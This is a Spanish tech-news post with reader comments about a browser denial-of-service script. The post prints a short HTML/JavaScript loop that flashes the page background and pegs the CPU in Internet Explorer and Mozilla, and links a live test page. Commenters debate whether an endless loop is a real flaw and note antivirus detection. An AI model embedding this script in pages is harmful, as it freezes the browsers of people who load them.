Banda Ancha EU

Información independiente
sobre fibra, móvil y ADSL

hosting en interdominios

Cerrado

Nuevo ataque DoS en Internet Explorer/Mozilla

CyRaNo de heinekenteam a publicado en su boletín de seguridad un DoS para el navegador IE en todas sus versiones, consiste en un script que cambia el fondo de la pagina a gran velocidad consiguiendo que la cpu se ponga a 100% en cuestión de segundos, no se puede considerar un bug o fallo porque esto no es un defecto del navegador si no una mala utilización del scripting, pero si es un DoS y por lo tanto hay que evitarlo, podrían poner un time out para las paginas o un control contra bucles infinitos porque es bastante molesto.

Podéis probarlo en esta dirección: www.heinekenteam.com/admin/

Por cierto se me olvidaba, lo e probado con Mozilla 1.1a y aunque no llega a verse la pagina y se pone la cpu al 100%

El exploit es el siguiente:

<BODY>
<SCRIPT>
var color = new Array;
color[1] = "black";
color[2] = "white";
for(x = 0; x <3; x++)
{
document.bgColor = color[x]
if(x == 2)
{
x = 0;
}
}
</SCRIPT>
</BODY>
</HTML>

Los comentarios más recientes se muestran primero. Haz click sobre un comentario para desplegar/plegar.
  • Cerrado

    ¬¬ Un bucle es un bucle...

    ...y su funcion en un programa es justamente esa, repetirse indefinidamente hasta cumplirse una condicion, no tendria sentido quitarle esa funcionalidad ya que esta hecho justamente para eso. Seria un disparate ponerle un "timeout" a los "for, while, do" ya que muchas aplicaciones estan programadas de forma que el bucle se rompa desde el interior de este (otra cosa es que no se deba hacer asi).

    Si quieres seguridad, no hay ordenador mas seguro que aquel que no esta en conexion con ningun otro y dentro de un cuarto cerrado con llave, tu mismo.

    • Cerrado

      Tienes toda la razón, los bucles son así. El problema e que…

      Tienes toda la razón, los bucles son así. El problema e que hay "sistemas operativos" (Bill, aceptamos barco...) en los que si peta el navegador, peta todo y hay que darle a CTRL-ALT-SUP, jeje, desgastás están esas teclas en muchos teclados.

      Puedes colgar cualquier aplicación con un for(;;;) pero si el problema se resuelve matando el proceso pues se acabó. Eso nunca se podrá limitar. ¿qué limite le puedes poner a un bucle?.

      • Cerrado

        BocaDePez BocaDePez
        0

        Pero en este caso lo que ocurre esq al pulsar esas conocidas…

        Pero en este caso lo que ocurre esq al pulsar esas conocidas tres teclas se nos queda pillao el equipo

  • Cerrado

    BocaDePez BocaDePez
    0

    Esas faltas de ortografía, que hacen daño a los ojos!!!

    A ver si cuidamos la ortografía, que parece mentira que un redactor cuelgue una noticia en una página de bandaancha.st con faltas...queda muy mal y muy poco serio:

    " a publicado" -----> ha publicado
    "si no" --------> sino
    "lo e probado" -----> lo he probado

    Son faltas de 1º de Eso...y no cuento los acentos ni fallos semánticos y sintácticos...y COÑO! que es una noticia de portada!!

  • Cerrado

    BocaDePez BocaDePez
    0

    esto es antiiiiguo

    juas ... esto por lo menos tiene mas de 1 año ... ya colgaba de aquella el inet expoder y dependiendo aveces el windos ... el notescapes te dejaba darle al stop y lo parabas.

  • Cerrado

    BocaDePez BocaDePez
    0

    NUEVA VULNERABILIDAD MORTAL

    Es multiplataforma, y produce un bloqueo total del proceso evitando que se ejecute el resto del programa, lo que puede producir un DoS que puede provocar miles y miles de muertos, sobre todo con programas de gestion de hospitales y centrales atómicas. Esta vulnerabilidad se conoce desde hace años pero no ha salido a la luz para evitar que coders maliciosos siembren el caos en el mundo y lleven a los paises industrializados a la bancarrota mas absoluta. Sin embargo, se ha producido un goteo de seguridad en microsoft y el código ha salido a la luz. El culpable ha sido inmediatamente despedido y demandado. El código dice:

    1 GOTO 1

    pd: Estamos paranóicos o simplemente un poco atontaos?

    • Cerrado

      BocaDePez BocaDePez
      0

      Eso pasa porque el código es interpretado... con una buena…

      Eso pasa porque el código es interpretado...

      con una buena optimización global, a tomar por culo esos bucles de programador retrasado

    • Cerrado

      BocaDePez BocaDePez
      0

      xDDD y luego diran q la version 1.1 de este bug es 1 goto 2 2…

      xDDD

      y luego diran q la version 1.1 de este bug es

      1 goto 2

      2 goto 1

      y asi , la casa sin barrer, es decir las noticias q de verdad importan, ni se comentan.

  • Cerrado

    "·$·"%"·%%$/·$%"

    Coño pero si esto parece el plus codificao y con gafas de culo de baso, la cpu se pone a 100% y parece que voy a ser abducido por el monitor, esto ya para hacerlo en un proyector de 60" y con la musica de Apocalypses Now a toda hostia. Parece que vas yonki xDD

    El tema, uso win2k sp2, ie6 con los ultimos parches y todo del windows update. k7 1,4 768ddr y se pone tontito para cerrar la ventana, aunque por cojones la terminas cerrando.

    Saludos, nex

  • Cerrado

    6

    A mi me pasa solo con el Mozilla

    Yo no se si será por culpa de un script como ese o q, pero el caso es q uso el Mozilla 1.0, y hay algunas páginas en las q la CPU se pone al 100% y va del culo. El caso es q esas mismas páginas con el IE no me dan problemas, así q no se si será un bug del Mozilla o q.

    • Cerrado

      BocaDePez BocaDePez
      0

      Kaspersky Antivirus Profesional detecta a la perfeccion el…

      Kaspersky Antivirus Profesional detecta a la perfeccion el exploit como JS. Joke Blinker, lo cual me da que pensar:

      1. Nuestro amigo del heineken team esta reinventando la rueda

      2. Otra razon mas para corroborar la eficacia de K.A.V.

      Nota: ni siquiera te deja salvar el codigo fuente en el disco duro!

    • Cerrado

      a mi me pasa 3/4 de lo mismo, con el mozilla, hay algunas…

      a mi me pasa 3/4 de lo mismo, con el mozilla, hay algunas páginas que al ir navegando el equipo va más lento que el caballo del malo, y es porque se está chupando todo el uso de la CPU.
      De todas formas lo del artículo con mozilla yo no lo veo... con IE sale ahí todo como el plus, pero el equipo no se me tuesta, le doy a chapar y finaliza tarea y punto.

      • Cerrado

        BocaDePez BocaDePez
        0

        Pero con el explorer 5. Carga el texto y no carga ninguna…

        Pero con el explorer 5. Carga el texto y no carga ninguna imagen y ves que el explorer esta chupando el 100% de la CPU.

  • Cerrado

    Efectivamente, pero ellos no tienen la culpa

    Es cierto, con Iexplorer 6 y con mozilla 1.1 pasa pero de ellos no es la culpa. ¿ Si esta permitido todo eso porque no iba un listo a darles caña ? (me refiero al tema de cambio de colores y todo eso)

  • Cerrado

    BocaDePez BocaDePez
    0

    El avp lo detecta

    Al entrar me ha saltado el antivirus (Kaspersky), avisandome del exploit no se qué Blinker... y el explorer se me ha terminado cerrando.

1